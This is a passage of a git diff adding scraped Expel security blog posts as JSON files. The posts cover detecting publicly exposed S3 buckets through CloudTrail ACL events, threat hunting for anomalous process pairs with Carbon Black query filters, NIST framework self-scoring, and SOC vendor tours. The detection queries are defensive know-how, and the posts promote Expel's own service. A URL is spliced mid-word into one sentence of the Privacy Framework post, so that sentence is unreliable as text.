SIEM, which is what we use to query and spot Amazon S3 bucket misconfigurations. This isn\u2019t the only approach but if you\u2019re interested here\u2019s an explanation to get started using Sumo . Alternatively you can use Amazon Elasticsearch Service to implement alerting, and there are other options as well. Once set up, you can search for AWS \u201cevents\u201d which contain indicators that an S3 bucket was made public. We\u2019ve outlined one approach on how to do this below but as those auto ads say \u201cyour mileage may vary.\u201d Depending on your tech and how your logs are stored, some of the terms we use may not be the same but should still give you a good idea of what to look for. The first step is to query for the \u201cPutBucketAcl\u201d event. This event notes when access control lists (ACL) are used to grant permissions on an existing bucket. Next, you\u2019ll need to narrow your search so it only focuses on buckets that have been made public. You can do this by searching for one or both of the predefined S3 Groups as follows, \u201chttp://acs.amazonaws.com/groups/global/AuthenticatedUsers\u201d \u201chttp://acs.amazonaws.com/groups/global/AllUsers\u201d From there, you\u2019ll need to sift through to get the necessary info. Below are the fields that\u2019ll give you the most useful information to get started with your investigation along with a sample value. \u201cuserName\u201d: \u201cliza\u201d \u201csourceIPAddress\u201d: \u201cxx.xx.xx.xx\u201d \u201cbucketName\u201d: \u201cfix-it-dear-henry\u201d \u201cURI\u201d: \u201chttp://acs.amazonaws.com/groups/global/AllUsers\u201d \u201cPermission\u201d: \u201cWRITE_ACP\u201d Now you\u2019ve got all the important investigative leads you\u2019ll need to get started. Based on the information you\u2019ve pulled from the logs, you\u2019ll know the following: The user performing the action The source of the activity The bucket that\u2019s being made public The group (such as \u201cAllUsers\u201d) that was granted access The permissions that were set for that bucket. Four red flags we look for when we investigate S3 alerts Now that you\u2019ve got the data, you\u2019re probably wondering what type of user behavior can tip you off when something fishy is going on with an S3 bucket? Based on our experience investigating Amazon S3 alerts, here are four red flags \u2014 big and small \u2014 that we watch for at our customers: 1. Suspicious source IP If the source IP responsible for an ACL change is coming from a network hosting provider for virtual private networks (VPN) such as IPVanish, that\u2019s strange. You\u2019d expect an employee to be configuring their S3 bucket settings from a known ISP, or at the very least a commonly seen VPN IP. An IP that\u2019s located in another country could (depending on your company) raise eyebrows. 2. Unusual user behavior A username in your AWS logs (which will look something like \u201cuserName\u201d: \u201cHenry.Liza@Corp[.]com\u201d or \u201carn:aws:iam::XXXXXXXXXXXX:user/Henry.Liza@Corp[.]com\u201d) will help you identify who in your org is making these changes. If the user is in development operations, production support or another administrative role then maybe it\u2019s okay that they\u2019re making configuration changes \u2026 but it\u2019s definitely worth checking. Alternatively, maybe their role doesn\u2019t fit into one of the categories I described above. In that case, you\u2019ll want to figure out why and how the user has these rights. Go search that user\u2019s past activity. Timelining their recent activity can provide a lot of useful information and context. 3. Interesting bucket names People usually name S3 buckets based on the types of information they put in them. So one way to figure out if an S3 bucket might have sensitive information is to simply look at its name. For example, one S3 bucket we recently investigated had \u201ckops state\u201d in the name and the permission level was set to \u201cREAD.\u201d (If you\u2019re not familiar, a quick Google search would reveal that \u201ckops\u201d is a tool used to configure Kubernetes clusters .) The \u201cstate\u201d refers to the information needed to manage those clusters, such as configurations and the keys the org is using to do so. That\u2019s not something you want the general public to be able to access! 4. Unnecessary user permissions granted S3 buckets will have one of five permission types. Three of these are particularly noteworthy: \u201cREAD\u201d, \u201cWRITE\u201d and \u201cFULL_CONTROL.\u201d The \u201cFULL_CONTROL\u201d permission level gives users the abilities associated with the other four permissions, such as to list the objects in the bucket (READ), to edit any object in the bucket (WRITE) and more. The permission(s) granted, coupled with the bucket name, will help you gauge the severity and risk. Amazon S3-related Expel alerts in real life: a quick case study Here at Expel, we recently detected an S3 bucket at one of our customers that was open to the public. Here\u2019s what the investigation looked like \u2026 It started with an alert in the Expel Workbench that looked like this: You can see that the Expel Workbench has already parsed out \u201cSource IP\u201d and \u201cUsername\u201d (two of the four red flags we identified above). In addition you can see that when this user made the S3 bucket \u201cclevername[.]com\u201d public, they set the permission level to \u201cREAD.\u201d At first glance this seems pretty benign. Wouldn\u2019t you want an S3 bucket that appears to hold a website (based on the name, that is) to be public? We collect a lot of context from our customers to help us prioritize the severity of alerts. In this case, we were able to use that context to quickly identify the source IP. It was from the customer\u2019s known public address space. If we didn\u2019t have this context, we could have searched for the IP to see if it was used anywhere else in the customer\u2019s environment. Next, we queried for the user\u2019s recent activity. It turns out that earlier that day, this user had created an S3 bucket with the event \u201cCreateBucket.\u201d We also saw that the user issued other commands such as \u201cGetBucketWebsite,\u201d \u201cPutBucketWebsite\u201d, \u201cGetBucketAcl\u201d and others. The evidence pointed to legitimate user activity \u2014 someone was trying to host a website using S3 buckets and test the access controls. Scanning through the logs, it looked like the user was checking and configuring the bucket\u2019s access controls and policies through commands like \u201cGetBucketPolicyStatus\u201d and \u201cPutBucketAcl.\u201d We found that the user ultimately deleted the bucket. And by using some open source intelligence (OSINT) \u2014 also known as LinkedIn and Google \u2014 we discovered that the user worked in a DevOps role for the customer and that the name of the bucket he made public matched the name of an annual charitable event that our customer was hosting. A new IP was stood up that same day with a similar name, which pointed to that bucket. Based on this intel, we concluded that the user was preparing for the launch of this charitable event, possibly testing for the anticipated influx of new website traffic that the customer usually gets around the time of year that they host this benefit. After digging deeper, we safely closed this investigation without having to notify the customer. The public S3 bucket in question was deleted, and the user\u2019s activity was related to legitimate web hosting purposes. How to put a lid on your Amazon S3 buckets If you\u2019re using AWS, keeping an eye out for warning signs that a bucket may have \u201cgone public\u201d should be top of mind. Here are a few pro tips you can implement relatively easily: Create a query in your SIEM (or other tech you may be using) to start surfacing alerts when S3 buckets are made public. You can use the fields I shared earlier or terms from Amazon\u2019s documentation to create your own query. By the way, this Access Control List (ACL) Overview page on the AWS website provides a good overview of what ACLs are, how you should (and shouldn\u2019t) use them and how you can keep an eye out for employees making changes to bucket permissions. Filter the useful information from those logs I mentioned above and check for red flags such as a suspicious IP, unusual user behavior or unexpected permissions changes being made to an S3 bucket. If a bucket in your org was left public or if you suspect that it shouldn\u2019t have been changed in the first place, check with your team to make sure it was intentional. It\u2019s easy for someone to experiment with bucket permissions and then forget to change them back, or leave the bucket public for a little too long. If you\u2019ve got a policy that says you shouldn\u2019t have any public S3 buckets, try using AWS Config to monitor them and make sure employees aren\u2019t accidentally making permissions changes. Want some help keeping an eye on your cloud security ? Check in with your MSSP or your SOC to make sure you\u2019re covered. Don\u2019t have either of those? Let\u2019s talk \u2014 we\u2019d love to help." +} \ No newline at end of file diff --git a/how-to-find-anomalous-process-relationships-in-threat.json b/how-to-find-anomalous-process-relationships-in-threat.json new file mode 100644 index 0000000000000000000000000000000000000000..f279d5336d9a16c58b059389bd9452b312f19b50 --- /dev/null +++ b/how-to-find-anomalous-process-relationships-in-threat.json @@ -0,0 +1,6 @@ +{ + "title": "How to find anomalous process relationships in threat ...", + "url": "https://expel.com/blog/how-to-find-anomalous-process-relationships-threat-hunting/", + "date": "Jul 2, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG How to find anomalous process relationships in threat hunting Security operations \u00b7 6 MIN READ \u00b7 MARY SINGH \u00b7 JUL 2, 2019 \u00b7 TAGS: Get technical / How to / Hunting / Managed security / SOC Peanut butter and jelly. Wine and cheese. Chips and salsa. Some things just go together. But httpd.exe paired with cmd.exe? Not so much. Finding anomalous process relationships \u2014 or \u201ccommands that don\u2019t belong together\u201d \u2014 might indicate a problem within your environment. I\u2019m talking about big problems such as malware execution, an unknown vulnerability and worst of all \u2026 security policies not being enforced. Wondering how you can detect anomalous parent:child relationships during threat hunting? Here are five steps for doing just that. (By the way, If you need a primer on threat hunting , or are wondering what the heck it is and why you should consider doing it, we\u2019ve got your back. We\u2019ve also got some suggestions on how to choose the right security tech to use for your hunt. ) Step 1: Prepare before you hunt Before you dive in, there are a few steps you should take first to make sure you get the most out of your hunt. First, make sure you know what is in your environment. Asset inventory is your friend \u2013 your blunt friend who tells it like it is. Knowing what is in your environment is a prerequisite to any effective hunt because if you don\u2019t know about it, you can\u2019t protect it. If you have a team, make sure you\u2019ve got the right people with the right skill sets ready to hunt. The \u201cright skill sets\u201d depend on who\u2019s on your team and the kind of organization you work for. Regardless of your team structure and industry, though, great hunters usually have a few hallmark personality traits \u2014 he or she is someone who has excellent analysis skills and is familiar with the organization\u2019s IT systems, software and processes. Last but not least, define the goal of your hunt. What do you want to get out of it? And how will those results help your company? Many organizations perform hunting in order to detect what active monitoring didn\u2019t catch, and attempt to reduce \u201cdwell time\u201d for undetected compromises \u2014 or the time that a threat is sitting in your environment unnoticed. Step 2: Get your data To find out which parent:child process pairings are anomalous, you\u2019re gonna have to gather some data. You need specific process data and context that includes: Timestamp Process name Process arguments Parent process name Parent process arguments Hostname User The timestamp, hostname and user context will help you figure out whether the activity you\u2019re investigating is legitimate or not. Those attributes will also help you identify additional activities happening during that time frame, on the same host and/or from the user in question. Now that you know what kind of process data you\u2019re looking for, how do you get it? There are three different ways to collect this process data, including: Direct API access to Endpoint Detection & Response ( EDR ) vendors that track processes Pro: You\u2019ll get direct access to lots of process information. Con: Depending on the vendor you work with, that company may or may not retain enough historical data to cover the hunt dates you\u2019re looking for. SIEM queries Pro: It\u2019s relatively easy to retrieve historical process data. Con: Your data might be impacted by how the SIEM ingests the raw process data, and how the SIEM handles the query (assuming it\u2019s written properly). Windows security event logs Pro: You can still collect process data using event logs even if you don\u2019t have an EDR tool in place. Cons: Sure, Windows security event logs are another way to collect your data, but: Windows Audit process tracking must be enabled (592/593 events on Win10 ) You need to fully enforce Windows Audit process tracking (using Group Policy, for example) Due to potential log size limits, you need to plan on sending Windows event logs to a centralized logging source, or regularly pull event data using a script such as PowerForensics or OSQuery Step 3: Narrow down your pairs Just like shoes and underwear, it\u2019s possible to have too many pairs of processes. After collecting the process information, I\u2019ve got lots of data. But yikes! There are one hundred million events. One way to narrow down the data is to filter on parent processes. At Expel, we isolate process pairings with parent processes associated with Microsoft Office, Java, web servers, databases, and Adobe Acrobat. We have found that these parent processes are the most commonly targeted by attackers, but you can adapt this filter as needed. Figure 1 shows an example parent process filter we use at Expel: parent_name:java.exe OR parent_name:javaw.exe OR parent_name:winword.exe OR parent_name:excel.exe OR parent_name:powerpnt.exe OR parent_name:w3wp.exe OR parent_name:httpd.exe OR parent_name:nginx.exe OR parent_name:tomcat.exe OR parent_name:sqlserver.exe OR parent_name:mysqld.exe OR parent_name:postgres.exe OR parent_name:mongod.exe OR parent_name:acrobat.exe OR parent_name:acrord32.exe Figure 1: Example parent process filter, in Carbon Black query format That oughta do it, right? Not quite. There are still one million events to sift through. So let\u2019s filter our data with known legitimate process pairings such as w3wp.exe:csc.exe (\u201ccsc.exe\u201d is a legitimate child process of IIS / \u201cw3wp.exe\u201d). Figure 2 shows another example filter we use at Expel that you could try in your own environment: \u2026AND NOT (parent_name=\"winword.exe\" AND (process_name=\"winword.exe\" OR process_name=\"chrome.exe\" OR process_args=\"*Microsoft Office*\" OR process_name=\"firefox.exe\" OR process_name=\"iexplorer.exe\")) AND NOT (parent_name=\"w3wp.exe\" AND process_name=\"csc.exe\") AND NOT (parent_name=\"powerpnt.exe\" AND (process_name=\"powerpnt.exe\" OR process_name=\"chrome.exe\" OR process_args=\"*Microsoft Office*\" Figure 2: Example parent / child / process arguments filter, in Carbon Black query format In the example above, we added specific process arguments so the data is not over filtered. Over filtering causes false negatives, and may result in an \u201c Oh Noes \u201d moment when your security team (or an IR firm) finds something later that should\u2019ve been caught previously. While over filtering isn\u2019t good, under filtering isn\u2019t ideal, either. When creating filters, consider the hunting time given to the security team, the organization\u2019s risk profile and the likelihood of each type of process being targeted. Customize and adjust your filters after each hunt to make subsequent hunts more reliable, efficient and fun over time. (Seriously, hunting can be fun!) Step 4: Consider further analysis techniques By using tech to automate your filtering, you\u2019ll narrow down your events. Use the security tools you\u2019ve got to enrich or augment process data with items such as reputation, file signature, file path, open source intel and more to help with manual review (or to filter even further). There are a few ways to manually review the resulting process pairings. Depending on the data format, your best bet is to use one of the most reliable tools I\u2019ve found \u2014 Excel. Every analyst has their own way of doing things, but I like to drop all my data into Excel and then sort by parent process, child process and then process arguments. After you highlight items of interest, sort by time, host or username to determine context. Depending on what you find, you may need to pull additional information from the host in question to decide whether the process activity you\u2019re reviewing is malicious or breaks your org\u2019s security policy. Alternatively, you can script the analysis with your programming language of choice. If you use Python like a normal person (Just kidding, Ruby fans!), then try implementing some interesting data analysis and manipulation with the Pandas library . If you aren\u2019t familiar with pandas , it is an open source library that provides data structures and data analysis tools for Python. Step 5: Share your analysis and findings a.k.a. How to justify the time (and money) spent on hunting Congratulations \u2014 you\u2019ve completed your hunt! Once you\u2019re done, now it\u2019s time to tell your team what you found and how you propose fixing the problems (if there are any). Organizations report their hunting results in lots of different ways \u2014 a Word document, PowerPoint slide(s), interpretive dance (Why not?) or a web reporting tool like Sharepoint, Confluence or Microsoft Teams. At Expel, we share our hunt findings with our customers right in Expel Workbench . No matter how you choose to present the findings of your hunt, your hunt report should \u2014 at a minimum \u2014 contain the following information: Description of the hunt technique What data was collected What was reviewed What was investigated Findings grouped by: Malicious Suspicious Notable (Or however you want to categorize your findings based on your perceived threat level) Make hunting part of your regular security responsibilities While hunting for anomalous process relationships can help you uncover malicious activity, I have to tell you that it doesn\u2019t always reveal APTz. Hunting may not even reveal malware. But here\u2019s the thing: If your organization is well protected and employees aren\u2019t breaking protocols, then your hunting results shouldn\u2019t be all that riveting. And that\u2019s good. But on the other hand, if your web server is ever compromised and an attacker runs a webshell to execute a command shell, you\u2019ll find it with this \u201canomalous process pairings\u201d hunt technique. Sure, every organization hopes that they\u2019ll never fall victim to an attack, but we all know that it\u2019ll happen eventually. Want to learn more about threat hunting? Then check out this post and then this post . Interested in hearing more about how we hunt here at Expel? Drop us a note ." +} \ No newline at end of file diff --git a/how-to-get-started-with-the-nist-cybersecurity-framework.json b/how-to-get-started-with-the-nist-cybersecurity-framework.json new file mode 100644 index 0000000000000000000000000000000000000000..b687469fc7d7287a28856a394e759468c1575530 --- /dev/null +++ b/how-to-get-started-with-the-nist-cybersecurity-framework.json @@ -0,0 +1,6 @@ +{ + "title": "How to get started with the NIST Cybersecurity Framework ...", + "url": "https://expel.com/blog/how-to-get-started-with-the-nist-cybersecurity-framework-csf/", + "date": "Mar 19, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG How to get started with the NIST Cybersecurity Framework (CSF) Security operations \u00b7 8 MIN READ \u00b7 BRUCE POTTER \u00b7 MAR 19, 2018 \u00b7 TAGS: Example / How to / Mission / NIST / Planning Alright, let\u2019s address the elephant in the room. Frameworks aren\u2019t known for being page turners \u2014 even when they\u2019re shortened into seven characters like the NIST CSF. But there are some things you do because they\u2019re \u201cgood\u201d for you \u2014 like going to the doctor, eating well and exercising. The NIST CSF is like that. While we can\u2019t turn the NIST CSF into the latest best seller (sorry!), we can give you a quick tour and show you exactly how Expel can positively affect your NIST CSF ratings \u2014 both now \u2026 and over the long term. Introduction Newsflash! The NIST Cybersecurity Framework was never intended to be something you could \u201cdo.\u201d It\u2019s supposed to be something you can \u201cuse.\u201d But that\u2019s often easier said than done. The CSF can be a confusing and intimidating process to go through. So, if you\u2019re at a loss about how to implement it, you\u2019re not alone. But rest assured, since the CSF was released back in 2013, lots of organizations have done it, including Expel. Like others, we\u2019ve found it to be a useful tool to help us understand where we are and where we\u2019re going as we grow our broader cyber risk management program. Here at Expel, we are our own customer. That means we use our own service as part of our internal IT security efforts. I\u2019ve honestly been shocked at the impact using the Expel service had on our CSF scores and wanted to share what I\u2019ve learned about how Expel can help you on the road to CSF nirvana. Watch the video overview \u2026 or keep scrolling to read on A three-minute tour of the NIST CSF Let\u2019s start with a \u201cCliffsNotes\u201d overview. Like an apple, at the core of the CSF is, unsurprisingly, the Core. The Core is meant to capture the entirety of cybersecurity. Yup, pick anything related to cybersecurity and it should be in the Core. If you\u2019re thinking \u201cthat sounds ambitious\u201d you\u2019re right. To capture everything, the Core is broken down into buckets (and even more buckets inside those buckets). Or, if you\u2019re more outdoorsy, you can think of the Core as a big tree with big branches (aka functional areas), which have smaller branches (aka categories), which have leaves on them (aka sub-categories). Whatever metaphor you choose, the subcategories have the specific types of things you should probably be doing. The Core has functional areas: identify, protect, detect, respond, and recover. These are basically the lifecycle of cybersecurity without actually being a loop. Under each functional area, there are categories. For instance, under Identify, there\u2019s asset management, business environment, governance, risk assessment, and risk management area. Under each category, there are (unsurprisingly) subcategories. For instance, under asset management, there are six sub-categories including things like \u201cPhysical devices and systems within the organization are inventoried\u201d and \u201cSoftware platforms and applications within the organization are inventoried.\u201d The Core is nothing if not comprehensive. It\u2019s a big tree, but it\u2019s a tree that can really help you mature your cyber risk management posture \u2026 which is pretty unique for a tree. Find your baseline (in two hours or less) Whew! Now that we\u2019ve got that out of the way, what can you do with the Core? At Expel, we\u2019ve found the CSF Core can be super helpful to describe where we are and where we want to be with respect to cyber risk management. The first step is getting a baseline of where we\u2019re at today. Here\u2019s how we suggest figuring out the \u201cas is\u201d state for your organization. Start by looking at the sub-categories. You\u2019ll see lots of very specific things that you should be doing. For example, under Anomalies and Events (AE) in the Detect (DE) functional area, there are five subcategories: DE.AE-1: A baseline of network operations and expected data flows for users and systems is established and managed DE.AE-2: Detected events are analyzed to understand attack targets and methods DE.AE-3: Event data are aggregated and correlated from multiple sources and sensors DE.AE-4: Impact of events is determined DE.AE-5: Incident alert thresholds are established You\u2019ll probably look at these subcategories and think \u201cyeah, I\u2019m kinda doing those things,\u201d which is good. But how well are you doing them? At Expel we use a six-point scale to rate ourselves on each subcategory (we\u2019re computer scientists, so our scale starts at 0). Here\u2019s what the scale looks like: By applying this scale to the (gulp!) 98 subcategories you\u2019ll get a good measure of where your organization stands. Just don\u2019t forget that there are 98 sub-categories. So, don\u2019t overthink it. You don\u2019t need to spend a bunch of time debating the finer points of each score. For instance, resist the urge to add significant digits to the scale. Try to stick with integer ratings. If you must, allow yourself. increments (for example, you can score a 2, 2.5, 3, 3.5, etc). If you\u2019re incrementing by tenths you\u2019re in the danger zone \u2026 and under no circumstance should you go to the hundredths place. Not ever. That\u2019s far too much specificity for what\u2019s meant to be a quick assessment of where you stand. At a leisurely pace of two sub-categories per minute, you\u2019ll be done in an hour and even have time for a break. Once you\u2019re done with the self assessment, take that break and then do it again. But this time, instead of documenting where you are, document where you want to be. When building your \u201cto-be,\u201d be aware that (with the rare exception) you don\u2019t need to be a five. Being \u201cworld class\u201d in anything takes a lot of effort and resources. Organizations that require world class security controls generally know it and are prepared to shell out megabucks (or megaBitcoin) to achieve it. In most cases you should probably be shooting for a four \u2014 sometimes a bit higher, sometimes a bit lower. Charting your course \u2026 literally OK. So now you\u2019ve got a lot of data and you\u2019re thinking \u201chow the heck do I analyze and interpret all of this data\u201d and \u201chow are my execs (who only understand simple shapes and primary colors) going to understand this?\u201d You\u2019re in luck. With this blog post, we\u2019re releasing the Expel self-scoring tool for NIST CSF . It\u2019s an excel spreadsheet that\u2019ll track all of your info and (bonus!) it\u2019ll autogenerate fancy shmancy radar charts for you. The spreadsheet rolls up all of your scores for each subcategory into an average for the category that you can use to see exactly where you stand and where you want to be. You can see an example of the type of graph the spreadsheet can create: NIST Cybersecurity Framework Analysis: Current State vs. Goal These graphs do a good job of highlighting the areas where you\u2019re doing really well (in this case, Identity: Governance) and areas where you need to focus your efforts (Detect, Respond and Recover). Every organization is different, so don\u2019t let the gaps freak you out. Remember that the CSF is an attempt to cover everything in cyber risk management. So even in large, mature organizations there are going to be areas that haven\u2019t been a priority and large gaps between where you\u2019re at and where you want to be. Now what? Well, it\u2019s time to prioritize and plan. Unfortunately, we don\u2019t have a spreadsheet to autogenerate that. Based on your business needs and the types of risks you\u2019re most concerned about, you\u2019ll need to figure out what gaps you want to work on and how you\u2019re going to close them. It\u2019s important to set expectations (with yourself and up the chain). Closing gaps isn\u2019t a short-term program. What usually emerges is a strategic plan with lots of little pieces that fall into place along the way. Using Expel to color in your CSF As I mentioned before, we\u2019ve gone through the exercise I outlined above here at Expel. And we also use Expel to protect Expel. As a result, we\u2019ve got an idea of how Expel can impact CSF scores. To understand the answer, first you need to understand a bit of what Expel does . In short, our transparent managed security service monitors your network 24\u00d77, investigates bad activity and helps you get the answers you need so you can respond to attackers and keep them out. We do that by using your existing security technologies and ingesting the alerts they create into our Workbench to keep tabs on what\u2019s happening in your network. No new endpoints to deploy, no complex integration. Expel\u2019s first-year impact For this example, let\u2019s assume you\u2019ve got a reasonable set of existing security controls: you have antivirus on the desktop, a next-gen firewall of some sort and maybe even some other intrusion detection product. But you don\u2019t have anyone whose job it is to look at those systems. You\u2019re hoping they\u2019re defending your network and that they\u2019ll sound a siren or blast a red light when something is wrong. In that case, your CSF graph may look a lot like the one above. Now, let\u2019s say you decide you want to move to Expel and want to know what your scores would look like. Take a look: Sample NIST CSF Analysis: Current State vs. With Expel Quite the change. Now, let\u2019s look at each functional area. Detect Since Expel is a 24\u00d77 service that detects bad and anomalous activities on your network, it lifts all of the Detect scores across the board. Our detection and correlation capabilities, which our analysts and engineers are constantly refining, detect threats in your enterprise and present them to our analysts in a structured and consistent way, 24-hours a day, seven days a week. So, it kinda makes sense that outsourcing your security operations leads to better scores in the Detect function. Respond In the Respond functional area, Expel also has a dramatic impact on each category. Our remediation actions are the reason we can move the needle so much. When we detect a potentially bad activity, we kick off an investigation. Our analysts look at the alerts, gather related data and if we find there\u2019s something legit bad going on, we declare it a security incident. But we don\u2019t stop there. We also give you remediation actions for each incident. These actions are concrete steps that you can take to address the threat, accompanied by our analysis and other supporting material. This process adds consistency and technical completeness to your incident response, so you can quickly address the attack and get back to running your business. Our remediation actions allow you to stand on the shoulders of our world-class platform and analysts, so you get a world class response capability. It\u2019s a huge lift in an area where many organizations struggle to even get to a \u201cthree\u201d despite years of trying. Recover Expel impacts the Recover functional area a bit less than Detect and Respond. Recover is focused on longer-term incident response issues like corporate lessons learned, updating plans, and reputation management. That said, Expel still impacts your Recover score since you\u2019re more informed about the incidents you\u2019ve experienced and the remediation steps you\u2019ve taken. The net result is that your Recover activities are better informed and more mature. Expel down the road Now, fast forward 12 months and let\u2019s look at what things look like after you\u2019ve been an Expel customer for a year. Unsurprisingly, you\u2019ll continue to make incremental improvements to Detect, Respond and Recover as you continue to refine those functional areas. But now there are also big jumps in Identify and Protect because over time Expel provides more and more impact in the early lifecycle functional areas. Sample NIST CSF Analysis: Expel on day 1 vs. Expel on day 365 As we get to know you as a customer, we learn more about your systems and networks \u2014 including what\u2019s normal and what\u2019s not. Over time, we\u2019ll uncover actions we think you should take to make your enterprise more resilient to attack. These resilience actions might be configuration changes on your firewall or data protection systems, user training to help with phishing or removal of accounts with shared roles so you can audit more easily. Our analysts know a lot about security, and we feel you should be able to learn from their expertise. We\u2019ll send you resilience actions whenever we uncover these deeper concerns. Sometimes these \u201cahha\u201d moments will come in the middle of an incident. Other times, we might be out getting a cup of coffee when inspiration strikes. Whenever we have an idea that\u2019ll help make your organization more secure, we\u2019ll pass that along. Really? I know it sounds too good to be true. And I confess I\u2019m a skeptical curmudgeon so even I was surprised. But \u2026 yes \u2026 really, Expel can help you rapidly close the gaps between where you are and where you want to be from a security risk management perspective. Heck, that\u2019s why I work at Expel. I feel strongly about helping businesses of all sizes to be more secure \u2014 not just big companies with huge security and risk programs. I think Expel is unique in this regard and can provide a nearly instantaneous lift for your security posture for relatively little expense and time. Bonus: If you\u2019re an Expel customer, we\u2019ve got an interactive version of the NIST CSF self-scoring tool built right into Expel Workbench for you. Just log in and start scoring!" +} \ No newline at end of file diff --git a/how-to-get-started-with-the-nist-privacy-framework.json b/how-to-get-started-with-the-nist-privacy-framework.json new file mode 100644 index 0000000000000000000000000000000000000000..c02502df252be3f1b25ce22c43c6359fe5e303d3 --- /dev/null +++ b/how-to-get-started-with-the-nist-privacy-framework.json @@ -0,0 +1,6 @@ +{ + "title": "How to get started with the NIST Privacy Framework", + "url": "https://expel.com/blog/how-to-get-started-with-nist-privacy-framework/", + "date": "Jan 28, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG How to get started with the NIST Privacy Framework Security operations \u00b7 3 MIN READ \u00b7 BRUCE POTTER \u00b7 JAN 28, 2020 \u00b7 TAGS: CISO / Framework / How to / NIST / Planning The final version of the NIST Privacy Framework is out. Privacy wonks, rejoice! The TL;DR? This new effort from NIST is a comprehensive framework that anyone can use to build a true privacy risk program, not just a compliance program. This means you can use the Privacy Framework to take a holistic approach to privacy instead of playing whack-a-mole with various controls in different regimes. It\u2019s a big deal because the Privacy Framework represents the democratization of privacy in the same way that the NIST Cyber Security Framework (CSF) brought security risk management to the masses. It demystifies a complhttps://expel.com/blog/how-to-get-started-with-the-nist-cybersecurity-framework-csf/ex subject and allows smaller, less technical organizations to transact on privacy in a meaningful way. If you didn\u2019t catch my previous post about the NIST Privacy Framework, you might want to peek at that too \u2014 here it is . W00h00 (AKA why this framework matters) I am legitimately excited about the Privacy Framework for a couple of reasons. 1. It\u2019s great to have a regulatory agnostic framework to help drive privacy risk programs. The NIST CSF has been an incredibly useful framework to help people assess where they are and where they want to be from a cyber security standpoint. We use it here at Expel to measure our own progress, and we even have a tool you can use to assess your own org. Lots of our customers use it too, and they\u2019ve told us that the tool is easy to use and effective. The Privacy Framework promises to have the same type of utility but in the privacy domain. 2. Today, we\u2019re at a very different point on the maturity curve when it comes to privacy versus cyber security. I served as a facilitator for NIST during the creation of the CSF and the sessions I was involved with were filled with people who had ideas based on frameworks they\u2019d created or used, their existing cyber security program and years of cyber experience. I also had the privilege of facilitating sessions at one of the NIST Privacy Framework workshops earlier this year \u2026 but the experience was much different. While there were definitely practitioners in the room who had ideas to share from their existing programs, there were many more who were just starting their privacy risk journey and were looking for guidance on how to proceed. I think that\u2019s a general reflection of the industry right now: everyone knows they need to care about privacy but they\u2019re not sure how to care and what kind of guardrails or assessments they should put in place. 3. Finally, the Privacy Framework is very similar in structure to the CSF. So if you\u2019ve used the CSF in any way \u2014 whether you\u2019ve used our Expel NIST CSF self-scoring tool or something else \u2014 the PF will look familiar. Any muscle memory you\u2019ve built up using the CSF will come in handy as you start to use the PF. And the directions for using this new scoring tool are pretty similar. Introducing the Expel Privacy Self-Scoring Tool Here\u2019s a sneak peek at our brand new privacy self-scoring tool , which is based on the new NIST Privacy Framework. We\u2019ve modeled it after our existing NIST CSF self-scoring tool. Given the similarity between the CSF and the PF, if you\u2019ve used our CSF tool, this one will feel very familiar. If you\u2019re wanting to address privacy risk in your own org but aren\u2019t sure where to start, then this tool is for you. It\u2019ll help you assess where you are today from a privacy standpoint and where you want to be. Here\u2019s how it works: Open the self-scoring tool and score yourself for each subcategory on a scale from 0 to 5, using integers only. Score your org according to the following scale: Don\u2019t overthink it. Download it when you have a chance and take a few hours to fill it out. It should take two to four hours the first time you go through it. We want your feedback We\u2019re working on more content that\u2019ll help you use the Privacy Framework, but for now we wanted to get the tool out for you to start using now that NIST\u2019s newest framework is finalized. If you download it and give it a try, please send us your thoughts so that we can improve the tool for the community." +} \ No newline at end of file diff --git a/how-to-get-the-most-out-of-your-upcoming-soc-tour.json b/how-to-get-the-most-out-of-your-upcoming-soc-tour.json new file mode 100644 index 0000000000000000000000000000000000000000..be853c7bfc9a5adfc5c545119059b95111e523b2 --- /dev/null +++ b/how-to-get-the-most-out-of-your-upcoming-soc-tour.json @@ -0,0 +1,6 @@ +{ + "title": "How To Get The Most Out Of Your Upcoming SOC Tour", + "url": "https://expel.com/blog/get-most-out-of-upcoming-soc-tour/", + "date": "Nov 14, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG How to get the most out of your upcoming SOC tour: making your provider uncomfortable Tips \u00b7 6 MIN READ \u00b7 MASE ISSA \u00b7 NOV 14, 2018 \u00b7 TAGS: How to / Managed security / Planning / Selecting tech / SOC Yes, you read that right. This is an article about how to make us uncomfortable. If you\u2019re in the market for an MDR or managed security services provider or looking to keep tabs on your existing provider, visiting their security operations center (SOC) can be a good way to get a sense for what you\u2019re really buying. Even the most technically advanced providers with great platforms (ahem) have people as part of their solution. The SOC floor is where the people and technology meet to provide \u2013 or fail to provide \u2013 value. Providers plan for these kinds of visits, and if you go by their default agenda you can expect to see pew-pew maps, talk with smart folks and basically get a more detailed version of the party line. We thought it would be interesting to tell you how to throw a wrench into the works \u2013 you can even use that wrench on us \u2013 with the end result of getting more useful feedback and a better perspective on what the life of a customer is really like. Start with their customers If you\u2019re planning a visit to a managed security provider\u2019s SOC and you haven\u2019t talked to any of their customers yet, stop planning your trip right now. The very best way to get a sense for what it\u2019s really like to be a customer is \u2026 wait for it \u2026 to talk to a customer. We\u2019ll be following up with a few pithy tidbits on conducting customer reference calls. For now, suffice it to say you\u2019ll get a higher fidelity picture of customer life by talking to customers. During a SOC visit, you\u2019ll likely be shown what the provider wants you to see by default (and yes, if you let us set the agenda we\u2019ll do the same thing). What we, at Expel, want you to see may be different than our competitors, but it will still be what we want you to see, not what you want to see. You shouldn\u2019t let us do that. Step 1: Prepare You\u2019re investing all this time, so maybe you should do a little prep. Let\u2019s skip the \u201cthink about your requirements, write them down, review them\u201d nonsense. You already know that. Here are a few things that will make your life better if you can do them ahead of time: Think about what we need to do to make you happy. No, seriously. Don\u2019t say \u201cwe want to reduce our risk.\u201d Of course you do. Be selfish. How do you want to spend your time during the day? What annoying work do you want out of your way? What thing should I, as a provider, never do, or you will curse my soul and haunt me forever? Let me say this again: be selfish. There are other things you want to get done besides the mundane day-to-day of security operations. What would make you and your team happy? Yes, you can say \u201csecurity\u201d and \u201chappy\u201d in the same sentence. I just did. QED. What do you want to pay? Know that up front. Discuss it with your provider before you commit to a visit. It\u2019s the easiest way to tell if you\u2019re wasting your time. When are you buying? This helps both of us. If a provider doesn\u2019t know when you\u2019re really going to buy, get ready to be annoyed at all the times you want to be left alone. It doesn\u2019t have to be precise, just close. \u201cProbably Q4 this year, maybe Q1 next.\u201d Perfect, I have expectations, I can modify my behavior so I don\u2019t piss you off. 